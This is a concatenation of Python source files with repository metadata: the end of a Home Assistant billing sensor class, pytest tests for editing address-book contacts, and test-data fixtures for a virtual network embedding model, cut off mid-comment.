"""Return the state attributes.""" attributes = {} attributes["unit_of_measurement"] = "days" attributes["friendly_name"] = "Billing As Of" return attributes class RemainingDaysSensor(FplEntity): def __init__(self, coordinator, config, account): super().__init__(coordinator, config, account, "Billing Remaining") @property def state(self): try: self._state= self.getData("remaining_days") except: pass return self._state @property def icon(self): return "mdi:calendar" def defineAttributes(self): """Return the state attributes.""" attributes = {} attributes["unit_of_measurement"] = "days" attributes["friendly_name"] = "Billing Remaining" return attributes

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3,234

117

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0

null

0

1

0

1

0

9

5c574d2028aa5b8a68d594496b695a4d2a5a573f

5,979

py

Python

test/test_edit_contact.py

IrishaCh/python_training

f4b52561adb9881a5ea294e6b54c64a676a24f40

[ "Apache-2.0" ]

null

test/test_edit_contact.py

IrishaCh/python_training

f4b52561adb9881a5ea294e6b54c64a676a24f40

[ "Apache-2.0" ]

null

test/test_edit_contact.py

IrishaCh/python_training

f4b52561adb9881a5ea294e6b54c64a676a24f40

[ "Apache-2.0" ]

null

# __author__ = 'Irina.Chegodaeva' import os from model.contact import Contact import random import pytest def test_edit_some_contact_from_edit_form(app, db, check_ui): if len(db.get_contact_list()) == 0: with pytest.allure.step('If there is no contact I will add a new one'): app.contact.add_contact(Contact(last_name="test" + app.libs.substring), delete_photo=False, dataset=(("1", "3"), ("2", "2"), ("3", "12"), ("4", "3"), ("5", "1"))) contact = Contact(first_name="First_Name", middle_name="Middle_Name", last_name="Last_Name" + app.libs.substring, nickname="Nickname", pic=str(os.path.dirname(__file__)) + "\\photo.gif", title="Title", company_name="Company Name", company_address="Company Address", home_phone="(999)111-11-11", mobile_phone="(999)111-11-22", work_phone="(999)111-11-33", fax="(999)111-11-44", email_1="email_1@company.com", email_2="email_2@company.com", email_3="email_3@company.com", homepage="http://www.homepage.net", birth_year="1970", anniv_year="1990", home_addr="Home Address", notes="Some Notes", extra_phone="(999)111-11-55") with pytest.allure.step('Given a contact list before edit'): old_contacts = db.get_contact_list() with pytest.allure.step('Given a random contact from the list for edit'): modified_contact = random.choice(old_contacts) with pytest.allure.step('I modified the contact'): app.contact.modify_some_contact_by_id(modified_contact.id, contact, delete_photo=True, dataset=(("1", "3"), ("2", "3"), ("3", "14"), ("4", "3")), edit_detail="edit_form") with pytest.allure.step('Given a contact list after edit'): new_contacts = db.get_contact_list() with pytest.allure.step('Then the length of the new contact list is equal to the length of the old list'): assert len(old_contacts) == len(new_contacts) with pytest.allure.step('The modified contact was changed in the old list'): contact.id = modified_contact.id old_contacts.remove(modified_contact) old_contacts.insert(int(modified_contact.id), contact) with pytest.allure.step('Then the new contact list is equal to the old list with the edit contact'): assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max) if check_ui: assert sorted(map(app.libs.clean_contact, new_contacts), key=Contact.id_or_max) ==\ sorted(app.contact.get_contact_list(), key=Contact.id_or_max) def test_edit_some_contact_from_details(app, db): if app.contact.count() == 0: with pytest.allure.step('If there is no contact I will add a new one'): app.contact.add_contact(Contact(last_name="test" + app.libs.substring), delete_photo=False, dataset=(("1", "3"), ("2", "2"), ("3", "12"), ("4", "3"), ("5", "1"))) contact = Contact(first_name="First_Name" + app.libs.substring, middle_name="Middle_Name", last_name="Last_Name" + app.libs.substring, nickname="Nickname", pic=str(os.path.dirname(__file__)) + "\\photo.gif", title="Title", company_name="Company Name", company_address="Company Address", home_phone="(999)111-11-11", mobile_phone="(999)111-11-22", work_phone="(999)111-11-33", fax="(999)111-11-44", email_1="email_1@company.com", email_2="email_2@company.com", email_3="email_3@company.com", homepage="http://www.homepage.net", birth_year="1970", anniv_year="1990", home_addr="Home Address", notes="Some Notes", extra_phone="(999)111-11-55") with pytest.allure.step('Given a contact list before edit'): old_contacts = db.get_contact_list() with pytest.allure.step('Given a random contact from the list for edit'): modified_contact = random.choice(old_contacts) with pytest.allure.step('I modified the contact'): app.contact.modify_some_contact_by_id(modified_contact.id, contact, delete_photo=True, dataset=(("1", "3"), ("2", "3"), ("3", "14"), ("4", "4")), edit_detail="detail_form") with pytest.allure.step('Given a contact list after edit'): new_contacts = db.get_contact_list() with pytest.allure.step('Then the length of the new contact list is equal to the length of the old list'): assert len(old_contacts) == len(new_contacts) with pytest.allure.step('When I changed the contact %s in the old list' % contact): contact.id = modified_contact.id old_contacts.remove(modified_contact) old_contacts.insert(int(modified_contact.id), contact) with pytest.allure.step('Then the new contact list is equal to the old list with the edited contact'): assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)

58.048544

111

0.546747

726

5,979

4.30854

0.173554

0.051151

0.081841

0.102302

0.895141

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0.863171

0.852302

0

0.042575

0.332163

5,979

102

112

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0

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0

0.051546

1

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false

0

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0

0.061856

0

null

0

1

0

1

0

null

0

7

5c8499a99a6991d17c525f46d501a52955ffb495

154,100

py

Python

test/commutativity_model/commutativity_model_test_data.py

vnep-approx/vnep-approx

3be6f56cf49f26ae0319e3b0c206abde51f3fcd9

[ "MIT" ]

12

2017-07-12T12:47:02.000Z

2022-01-03T09:28:57.000Z

test/commutativity_model/commutativity_model_test_data.py

vnep-approx/vnep-approx

3be6f56cf49f26ae0319e3b0c206abde51f3fcd9

[ "MIT" ]

null

test/commutativity_model/commutativity_model_test_data.py

vnep-approx/vnep-approx

3be6f56cf49f26ae0319e3b0c206abde51f3fcd9

[ "MIT" ]

4

2019-05-17T12:41:56.000Z

2021-02-17T13:05:14.000Z

from collections import OrderedDict from alib import datamodel def filter_requests_by_tags(*tag_groups): """ Filter request data by tags. Tags can be grouped. A request id is returned if it includes all tags of at least one tag group. :param tag_groups: A tag group is either a single string or a set of strings :return: """ tag_groups = [{tags} if isinstance(tags, str) else set(tags) for tags in tag_groups] if not tag_groups: # default: tags_args is empty: yield everything tag_groups = [set()] for request_id, req_data in example_requests.items(): if any(tags <= req_data["tags"] for tags in tag_groups): yield request_id def create_request(request_id, reverse_edges=None): """ :param request_id: :param reverse_edges: set of edges that should be reversed if they are contained in the original request. :return: """ if reverse_edges is None: reverse_edges = set() request_dict = example_requests[request_id] request = datamodel.Request("{}_req".format(request_id.replace(" ", "_"))) for node in request_dict["nodes"]: allowed = ["u", "v", "w"] if "assumed_allowed_nodes" in request_dict: allowed = request_dict["assumed_allowed_nodes"][node] request.add_node(node, 1, "t1", allowed_nodes=allowed) for edge in request_dict["edges"]: if edge in reverse_edges: edge = edge[1], edge[0] request.add_edge(edge[0], edge[1], 1) request.graph["root"] = next(i for i in request.get_nodes() if not request.get_in_neighbors(i)) return request SIMPLE_PATH = { "tags": {"cactus", "bags", "tree"}, "nodes": [ "i1", "i2", "i3" ], "edges": [ ("i1", "i2"), ("i2", "i3"), ], "labels": { "i1": set(), "i2": set(), "i3": set(), }, "bags": { "i1": {frozenset(): {("i1", "i2")}}, "i2": {frozenset(): {("i2", "i3")}}, "i3": {frozenset(): set()}, } } SIMPLE_CYCLE_1 = { "tags": {"cactus", "bags"}, "nodes": [ "i1", "i2", "i3" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i3"), ], "labels": { "i1": {"i3"}, "i2": {"i3"}, "i3": {"i3"}, }, "bags": { "i1": {frozenset(["i3"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i3"]): {("i2", "i3")}}, "i3": {frozenset(): set()}, } } SIMPLE_CYCLE_2 = { "tags": {"cactus"}, "nodes": [ "i1", "i2", "i3", "i4" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i4"), ], "labels": { "i1": {"i4"}, "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4"}, } } # i4 should not propagate to i1 CYCLE_WITH_NODE_BEFORE_START_1 = { "tags": {"cactus", "flow_preservation_constraints", "node_mapping_constraints", "decomposition"}, "nodes": [ "i1", "i2", "i3", "i4" ], "edges": [ ("i1", "i2"), ("i2", "i3"), ("i2", "i4"), ("i3", "i4"), ], "labels": { "i1": set(), "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4"}, }, "assumed_root": "i2", "assumed_allowed_nodes": { "i1": ["v"], "i2": ["u"], "i3": ["u", "v"], "i4": ["u", "v"], }, "constraints": { "flow_preservation": { ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i2','i1')]_comm_index[]", ( (-1.0, "edge_var", (('i2', 'i1'), frozenset(), ("v", "u"))), (-1.0, "source_var", (('i2', 'i1'), frozenset(), "u")), (1.0, "edge_var", (('i2', 'i1'), frozenset(), ("u", "v"))), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i2','i1')]_comm_index[]", ( (-1.0, "edge_var", (('i2', 'i1'), frozenset(), ("u", "v"))), (1.0, "edge_var", (('i2', 'i1'), frozenset(), ("v", "u"))), (1.0, "sink_var", (('i2', 'i1'), frozenset(), "v")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i2','i3')]_comm_index[i4_u]", ( (-1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "u")]), ("v", "u"))), (-1.0, "source_var", (("i2", "i3"), frozenset([("i4", "u")]), "u")), (1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "u")]), "u")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i2','i3')]_comm_index[i4_v]", ( (-1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "v")]), ("v", "u"))), (-1.0, "source_var", (("i2", "i3"), frozenset([("i4", "v")]), "u")), (1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "v")]), ("u", "v"))), (1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "v")]), "u")), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i2','i3')]_comm_index[i4_u]", ( (-1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "u")]), ("v", "u"))), (1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "u")]), "v")), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i2','i3')]_comm_index[i4_v]", ( (-1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "v")]), ("u", "v"))), (1.0, "edge_var", (("i2", "i3"), frozenset([("i4", "v")]), ("v", "u"))), (1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "v")]), "v")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i3','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "u")]), "u")), (-1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "u")]), ("v", "u"))), (1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "sink_var", (("i3", "i4"), frozenset([("i4", "u")]), "u")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i3','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "v")]), "u")), (-1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "v")]), ("v", "u"))), (1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "v")]), ("u", "v"))), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i3','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "u")]), "v")), (-1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "u")]), ("v", "u"))), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i3','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "v")]), "v")), (-1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "v")]), ("u", "v"))), (1.0, "edge_var", (("i3", "i4"), frozenset([("i4", "v")]), ("v", "u"))), (1.0, "sink_var", (("i3", "i4"), frozenset([("i4", "v")]), "v")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i2','i4')]_comm_index[i4_u]", ( (-1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "u")]), ("v", "u"))), (-1.0, "source_var", (("i2", "i4"), frozenset([("i4", "u")]), "u")), (1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "sink_var", (("i2", "i4"), frozenset([("i4", "u")]), "u")), )), ("flow_preservation_req[{req_name}]_snode[u]_vedge[('i2','i4')]_comm_index[i4_v]", ( (-1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "v")]), ("v", "u"))), (-1.0, "source_var", (("i2", "i4"), frozenset([("i4", "v")]), "u")), (1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "v")]), ("u", "v"))), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i2','i4')]_comm_index[i4_u]", ( (-1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "u")]), ("u", "v"))), (1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "u")]), ("v", "u"))), )), ("flow_preservation_req[{req_name}]_snode[v]_vedge[('i2','i4')]_comm_index[i4_v]", ( (-1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "v")]), ("u", "v"))), (1.0, "edge_var", (("i2", "i4"), frozenset([("i4", "v")]), ("v", "u"))), (1.0, "sink_var", (("i2", "i4"), frozenset([("i4", "v")]), "v")), )) }, "node_mapping": { ("node_mapping_aggregation_req[{req_name}]_vnode[i1]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i1", "v")), (1.0, "node_mapping_var", ("i1", frozenset(), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i2", "u")), (1.0, "node_mapping_var", ("i2", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[u]_bag[i4]", ( (-1.0, "node_agg_var", ("i2", "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[i4]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[v]_bag[i4]", ( (-1.0, "node_agg_var", ("i3", "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i4", "u")), (1.0, "node_mapping_var", ("i4", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i4", "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[u]_vedge[('i2','i1')]_comm_index[]", ( (-1.0, "source_var", (("i2", "i1"), frozenset(), "u")), (1.0, "node_mapping_var", ("i2", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i1]_snode[v]_vedge[('i2','i1')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i2", "i1"), frozenset(), "v")), (1.0, "node_mapping_var", ("i1", frozenset(), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[u]_vedge[('i2','i3')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i2", "i3"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[u]_vedge[('i2','i3')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i2", "i3"), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[u]_vedge[('i2','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i2", "i4"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[u]_vedge[('i2','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i2", "i4"), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i2", frozenset([("i4", "v")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i2','i3')]_comm_index[i4_u]_bag[i4]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i2','i3')]_comm_index[i4_v]_bag[i4]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "v")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i2','i3')]_comm_index[i4_u]_bag[i4]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i2','i3')]_comm_index[i4_v]_bag[i4]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i3','i4')]_comm_index[i4_u]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "u")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i3','i4')]_comm_index[i4_v]", ( (-1.0, "source_var", (("i3", "i4"), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset([("i4", "v")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[u]_vedge[('i2','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i2", "i4"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i4", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i2','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i2", "i4"), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[u]_vedge[('i3','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i3", "i4"), frozenset([("i4", "u")]), "u")), (1.0, "node_mapping_var", ("i4", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[v]_vedge[('i3','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i3", "i4"), frozenset([("i4", "v")]), "v")), (1.0, "node_mapping_var", ("i4", frozenset(), "v")), )), } }, "mappings": [ { "flow": 0.25, "expected": { "nodes": { "i1": "v", "i2": "u", "i3": "u", "i4": "u", }, "edges": { ("i1", "i2"): [("v", "u")], ("i2", "i3"): [], ("i2", "i4"): [], ("i3", "i4"): [], }, }, "variables": { ("node_mapping_var", "i1", frozenset(), "v"), ("node_mapping_var", "i2", frozenset(), "u"), ("node_mapping_var", "i2", frozenset([("i4", "u")]), "u"), ("node_mapping_var", "i3", frozenset([("i4", "u")]), "u"), ("node_mapping_var", "i4", frozenset(), "u"), ("source_var", ("i2", "i1"), frozenset(), "u"), ("edge_var", ("i2", "i1"), frozenset(), ("u", "v")), ("sink_var", ("i2", "i1"), frozenset(), "v"), ("source_var", ("i2", "i3"), frozenset([("i4", "u")]), "u"), ("sink_var", ("i2", "i3"), frozenset([("i4", "u")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "u")]), "u"), ("sink_var", ("i2", "i4"), frozenset([("i4", "u")]), "u"), ("source_var", ("i3", "i4"), frozenset([("i4", "u")]), "u"), ("sink_var", ("i3", "i4"), frozenset([("i4", "u")]), "u"), } }, { "flow": 0.5, "expected": { "nodes": { "i1": "v", "i2": "u", "i3": "u", "i4": "v", }, "edges": { ("i1", "i2"): [("v", "u")], ("i2", "i3"): [], ("i2", "i4"): [("u", "v")], ("i3", "i4"): [("u", "w"), ("w", "v")], }, }, "variables": { ("node_mapping_var", "i1", frozenset(), "v"), ("node_mapping_var", "i2", frozenset(), "u"), ("node_mapping_var", "i2", frozenset([("i4", "v")]), "u"), ("node_mapping_var", "i3", frozenset([("i4", "v")]), "u"), ("node_mapping_var", "i4", frozenset(), "v"), ("source_var", ("i2", "i1"), frozenset(), "u"), ("edge_var", ("i2", "i1"), frozenset(), ("u", "v")), ("sink_var", ("i2", "i1"), frozenset(), "v"), ("source_var", ("i2", "i3"), frozenset([("i4", "v")]), "u"), ("sink_var", ("i2", "i3"), frozenset([("i4", "v")]), "u"), ("source_var", ("i2", "i4"), frozenset([("i4", "v")]), "u"), ("edge_var", ("i2", "i4"), frozenset([("i4", "v")]), ("u", "v")), ("sink_var", ("i2", "i4"), frozenset([("i4", "v")]), "v"), ("source_var", ("i3", "i4"), frozenset([("i4", "v")]), "u"), ("edge_var", ("i3", "i4"), frozenset([("i4", "v")]), ("u", "w")), ("edge_var", ("i3", "i4"), frozenset([("i4", "v")]), ("w", "v")), ("sink_var", ("i3", "i4"), frozenset([("i4", "v")]), "v"), } } ] } # unbalanced version; i6 should not propagate to i1 CYCLE_WITH_NODE_BEFORE_START_2 = { "tags": {"cactus"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6" ], "edges": [ ("i1", "i2"), ("i2", "i3"), ("i2", "i6"), ("i3", "i4"), ("i4", "i5"), ("i5", "i6"), ], "labels": { "i1": set(), "i2": {"i6"}, "i3": {"i6"}, "i4": {"i6"}, "i5": {"i6"}, "i6": {"i6"}, } } # only i3 should propagate to i1, i2, i3 CYCLE_WITH_NODE_AFTER_END = { "tags": {"cactus", "node_mapping_constraints"}, "nodes": [ "i1", "i2", "i3", "i4" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i3"), ("i3", "i4"), ], "labels": { "i1": {"i3"}, "i2": {"i3"}, "i3": {"i3"}, "i4": set(), }, "assumed_root": "i1", "assumed_allowed_nodes": { "i1": ["u"], "i2": ["v"], "i3": ["u", "v"], "i4": ["w"], }, "constraints": { "node_mapping": { ("node_mapping_aggregation_req[{req_name}]_vnode[i1]_snode[u]_bag[i3]", ( (-1.0, "node_agg_var", ("i1", "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "v")]), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i2]_snode[v]_bag[i3]", ( (-1.0, "node_agg_var", ("i2", "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "v")]), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[u]_bag[]", ( (-1.0, "node_agg_var", ("i3", "u")), (1.0, "node_mapping_var", ("i3", frozenset(), "u")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i3]_snode[v]_bag[]", ( (-1.0, "node_agg_var", ("i3", "v")), (1.0, "node_mapping_var", ("i3", frozenset(), "v")), )), ("node_mapping_aggregation_req[{req_name}]_vnode[i4]_snode[w]_bag[]", ( (-1.0, "node_agg_var", ("i4", "w")), (1.0, "node_mapping_var", ("i4", frozenset(), "w")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i3_u]", ( (-1.0, "source_var", (("i1", "i2"), frozenset([("i3", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i2')]_comm_index[i3_v]", ( (-1.0, "source_var", (("i1", "i2"), frozenset([("i3", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "v")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i3_u]", ( (-1.0, "source_var", (("i1", "i3"), frozenset([("i3", "u")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "u")]), "u")), )), ("node_mapping_req[{req_name}]_vnode[i1]_snode[u]_vedge[('i1','i3')]_comm_index[i3_v]", ( (-1.0, "source_var", (("i1", "i3"), frozenset([("i3", "v")]), "u")), (1.0, "node_mapping_var", ("i1", frozenset([("i3", "v")]), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i3_u]_bag[i3]", ( (-1.0, "sink_var", (("i1", "i2"), frozenset([("i3", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "u")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i1','i2')]_comm_index[i3_v]_bag[i3]", ( (-1.0, "sink_var", (("i1", "i2"), frozenset([("i3", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "v")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i3')]_comm_index[i3_u]", ( (-1.0, "source_var", (("i2", "i3"), frozenset([("i3", "u")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "u")]), "v")), )), ("node_mapping_req[{req_name}]_vnode[i2]_snode[v]_vedge[('i2','i3')]_comm_index[i3_v]", ( (-1.0, "source_var", (("i2", "i3"), frozenset([("i3", "v")]), "v")), (1.0, "node_mapping_var", ("i2", frozenset([("i3", "v")]), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i1','i3')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i1", "i3"), frozenset([("i3", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i1','i3')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i1", "i3"), frozenset([("i3", "v")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset(), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i2','i3')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i3", "u")]), "u")), (1.0, "node_mapping_var", ("i3", frozenset(), "u")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i2','i3')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i2", "i3"), frozenset([("i3", "v")]), "v")), (1.0, "node_mapping_var", ("i3", frozenset(), "v")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[u]_vedge[('i3','i4')]_comm_index[]", ( (-1.0, "source_var", (("i3", "i4"), frozenset(), "u")), (1.0, "node_mapping_var", ("i3", frozenset(), "u")), )), ("node_mapping_req[{req_name}]_vnode[i3]_snode[v]_vedge[('i3','i4')]_comm_index[]", ( (-1.0, "source_var", (("i3", "i4"), frozenset(), "v")), (1.0, "node_mapping_var", ("i3", frozenset(), "v")), )), ("node_mapping_in_edge_to_bag_req[{req_name}]_vnode[i4]_snode[w]_vedge[('i3','i4')]_comm_index[]_bag[]", ( (-1.0, "sink_var", (("i3", "i4"), frozenset(), "w")), (1.0, "node_mapping_var", ("i4", frozenset(), "w")), )), } } } # i4 should propagate to all cycle nodes i2, i3, i4 CYCLE_WITH_NODES_BEFORE_AND_AFTER = { "tags": {"cactus"}, "nodes": [ "i1", "i2", "i3", "i4", "i5" ], "edges": [ ("i1", "i2"), ("i2", "i3"), ("i2", "i4"), ("i3", "i4"), ("i4", "i5"), ], "labels": { "i1": set(), "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4"}, "i5": set(), } } # i4 should not propagate to i5 CYCLE_WITH_BRANCH = { "tags": {"cactus", "bags"}, "nodes": [ "i1", "i2", "i3", "i4", "i5" ], "edges": [ ("i1", "i2"), ("i1", "i3"), ("i2", "i4"), ("i3", "i4"), ("i3", "i5"), ], "labels": { "i1": {"i4"}, "i2": {"i4"}, "i3": {"i4"}, "i4": {"i4"}, "i5": set(), }, "bags": { "i1": {frozenset(["i4"]): {("i1", "i2"), ("i1", "i3")}}, "i2": {frozenset(["i4"]): {("i2", "i4")}}, "i3": {frozenset(["i4"]): {("i3", "i4")}, frozenset(): {("i3", "i5")}, }, "i4": {frozenset(): set()}, "i5": {frozenset(): set()}, }, } # i3 should propagate to i1, i2, i3 # i6 should propagate to i4, 